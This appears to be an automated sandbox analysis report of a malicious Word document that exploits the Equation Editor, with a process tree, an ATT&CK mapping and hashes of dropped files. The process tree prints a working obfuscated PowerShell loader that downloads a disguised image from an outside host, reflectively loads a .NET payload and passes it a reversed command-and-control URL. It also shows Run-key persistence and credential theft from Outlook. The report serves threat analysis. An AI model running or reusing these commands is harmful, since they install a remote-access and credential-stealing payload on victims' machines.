- Suspicious use of SetWindowsHookEx
PID:2204

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1740

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1280

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\imageiloveyoutruly.vbs"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:784

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDEDgTreMgDgTre1DgTreDgDgTreODgTreDgTre1DgTreDDgTreDgTreMDgTreDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQBGDgTreHIDgTrebwBtDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreC0DgTrebgBlDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEUDgTrebgBjDgTreG8DgTreZDgTreBpDgTreG4DgTreZwBdDgTreDoDgTreOgBVDgTreFQDgTreRgDgTre4DgTreC4DgTreRwBlDgTreHQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTreZQDgTregDgTreDDgTreDgTreIDgTreDgTretDgTreGEDgTrebgBkDgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreGcDgTredDgTreDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreCsDgTrePQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreUwB1DgTreGIDgTrecwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreLDgTreDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreQwBvDgTreG4DgTredgBlDgTreHIDgTredDgTreBdDgTreDoDgTreOgBGDgTreHIDgTrebwBtDgTreEIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCkDgTreOwDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTregDgTreD0DgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTreuDgTreEcDgTreZQB0DgTreFQDgTreeQBwDgTreGUDgTreKDgTreDgTrenDgTreFDgTreDgTreUgBPDgTreEoDgTreRQBUDgTreE8DgTreQQBVDgTreFQDgTreTwBNDgTreEEDgTreQwBBDgTreE8DgTreLgBWDgTreEIDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBEDgTreEUDgTreVwDgTrevDgTreDDgTreDgTreOQDgTrewDgTreDIDgTreLwDgTreyDgTreDIDgTreLgDgTre0DgTreDcDgTreMQDgTreuDgTreDMDgTreMwDgTrexDgTreC4DgTreNQDgTre0DgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreEMDgTreSDgTreBODgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.DEW/0902/22.471.331.54//:ptth' , '1' , 'C:\ProgramData\' , 'CCHN','RegAsm',''))} }"
4⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\CCHN.vbs
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\kdwucecuvcwpvkandkb"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:740

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nxbncwmvjkoufywrmvospu"
6⤵
PID:1044

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nxbncwmvjkoufywrmvospu"
6⤵
- Accesses Microsoft Outlook accounts
PID:332

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xahfvpxpxsghhekvdfbtahndf"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
8a19e2f05bb9c727f7fb24ef7e6541e7

SHA1
fc4e212ec0c090fffc2c1b9c70fe5cb6c77592db

SHA256
7eb17f03f49ad906d62f715fe4e81e9341f8e7e900e429bc83d0787340dfa42f

SHA512
82b40631302b2338d74c48aaf0b848435020936eb99a1945a6a5397e123a6107eb5681d458595af641d4078383de41370afc882d94aec89e4c65f51e86c4c0d4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
391260f9f1eb11eeb78d1234a1be2b16

SHA1
1bcfd5e4ef4d77d08231325771f86173517a72c8

SHA256
604fef1789b2bf15ce23a867357e1f3390fb9c660527989410eb169ea524e326

SHA512
4e732c5ad888a9f7cb082eac02cb5babade5521be66e3a9bc8b5b6b88dc9362b2457e3464a21a5b0d40e1ec29c421a974e6d7a455a3c61e40883278a768263cb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
efdc1d25ccf283c8424046be11799905

SHA1
38d3cd966a1635c412c3b6741e63b324e7828963

SHA256
d0d85a18bafd6239f7be2adc2d27de549062e5e522af9f48e0a9f0ecd9c6c955

SHA512
385281d0842fd93de752e7764512f8a4134f68d2025e07cf5e08ea13fed9a0c7e54e5b49243724602b56ad36d349b476c5831f32132e7afe00a3ea221f1f3b02

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
eea778ef4de44e0550999fa8c71c3fcc

SHA1
345a0d6fad74909153b35c70175cc271442d56db

SHA256
ce16faa726799bbacb4df56169766be76f8ebcd52b76c9c8ad2ae1824ef11b59

SHA512
198b1539dcb08e89c13bc4ffedf1ac097a17b06c17b39034073f2f7cc68960afcdb370b5c855dd6b0715ec0ac198062b0e69d608ed10f33b73af5a64a3885cb2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
ec7d76eca43360999f60381c9b7bce4f

SHA1
e8f558a04b86596ea1ca7f9bed2df45d0c8fb62f

SHA256
733d6788a614640107948c41542c037e4b700810a2a7a6f44ee7029dd0a67316

SHA512
62f2783e8cf60d6f1bff976b2adbaa698d4f31a0da1ef4e3c15e1cb220c9aad90978d552d6a0166d1eb03e0deacd3afddf6ca370ff84588b607136e820141252

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{3A61BFDC-4A31-47CC-A823-8FCD39D26929}.FSD
Filesize
128KB

MD5
0e7bcaced970e603faefaad149c0af40

SHA1
c35b967830345f0a067d97df3225d10389dc038f

SHA256
e6a383cabf1432d839f1a896cc6c482c28b169afef64b2926e589b8a7b4de0b1

SHA512
62e20793e046be08018de5ee849f3fc7109b4c69719a06f366196e8328e2b65c072deeed7e66c421b5800ec9f43ac509c5c9976da6f7fd7b9d11583734604390

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize
128KB

MD5
ede25303b757cf82f6c8b101c22f6a35

SHA1
1a2d439d0c4d421fc7320bf721c75aa3f535ac14

SHA256
6b80ea0894da05b11518f3ef2cf45c7e9ed533cef469e5fe3b9e5a1aac81c938

SHA512
083ed36c137f713376a41a4e6a8ecae6e082f38b77c83fd56b72312a2b5333fd4ef87cd4b9cab1723bba5c38decb7fe6cfddb472ab3d0e8afcf197d0b783aa51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{20A2058C-2FB2-4D33-86B2-F8DFA515E9BC}.FSD
Filesize
128KB

MD5
0a0aebca4d40c9b6f29c8fd8425fbaf6

SHA1
09f478183c5fb8c35a5f5a0620a61b51990d69c0

SHA256
04eb2089971c500b82538342f7240193446bb5beac570c33360ca8e4a78e9abc

SHA512
ef9230c3b7a9757f471d66f8b3d394947160f23723c93c4c9dd6b4a8597e55bdbe9320c31883e82fb7ff3c3888ad7ec12f807122f833f7f2834198ca52128616

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OFFQJ7AH\iamwithyoubecauseiloveyoualotwhichneverbeenforesxyoumysweetheartialwaysloveryoutrulybeaucse___ineverwanttokissyou[1].doc
Filesize
73KB

MD5
96bd8f3d1b8badd184f3b8de29a26ab5

SHA1
5bbf4c72f5d2adc0348ac73cc1f70608dd1d554b

SHA256
74b7cbd3c66d01a6e25ccbe17375138c6a32699c61bf170e18ffecd6ebd55237

SHA512
dd8d1208f1954b24f5d2becfafa0ae27824a449486e946e6500a04c23c671a2ebb633b4c6808881003164aec027bd40801093d2b82e8e70f82408be5a2929847

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab695E.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6EFA.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar85EB.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdwucecuvcwpvkandkb
Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Local\Temp\{CFBCDC32-6B47-4384-9BA9-C919D60485CE}
Filesize
128KB

MD5
c17dd05f6ebac0cc7b18848975ecbd53

SHA1
2cbd4f7458c6acb7980aa37b3564f14ab043786a

SHA256
e8c8cc89c499504fe8e5e5c4bfdf16a30a6888b5bac69424235bd96c712cd175

SHA512
ec93f823a693577bfc368d9ead4aec47b078d0e0dbb07a9056fea393ba0b8a193104348dee9f5d3f35c45189e5b0f3e026e5b56edd317a7332838c3892a20e02

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\T7YI0JS1.txt
Filesize
827B

MD5
94d9eec1d06880ca7d0431c30c35db9d

SHA1
c416a89c5be04727298ada18bf4507d3c5116dc3

SHA256
bc1591a40d32982d94ad9b4ed9c68247dd991256fb2b7d00c3f59868c08e228b

SHA512
3b6bd64c8b525a8c70d39029439d954d6f6325ba7cad183c22812a7f4a5fbce7c7da28bd640d355835c2cfdba039321bba928b8a9c6c16955d1d8a3ea1d14cf8

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
cb00e2baae33f87c6bf578b95df446ae

SHA1
b4998659ba700e7dd60c493e5564fa3e0898a311

SHA256
2a83a8fe39d8df7f6cdf7874be02f20491b1460fc22ac8e1a297eeff02e080e5

SHA512
77a29658c931d0b9db1c65e24ffc86e5c74d2859222dd2106000271d75fd8a357807daf79b461f5f7dce8f3117472dee6acc4716fc8cee559f9b23ac52b3914e

Download Submit
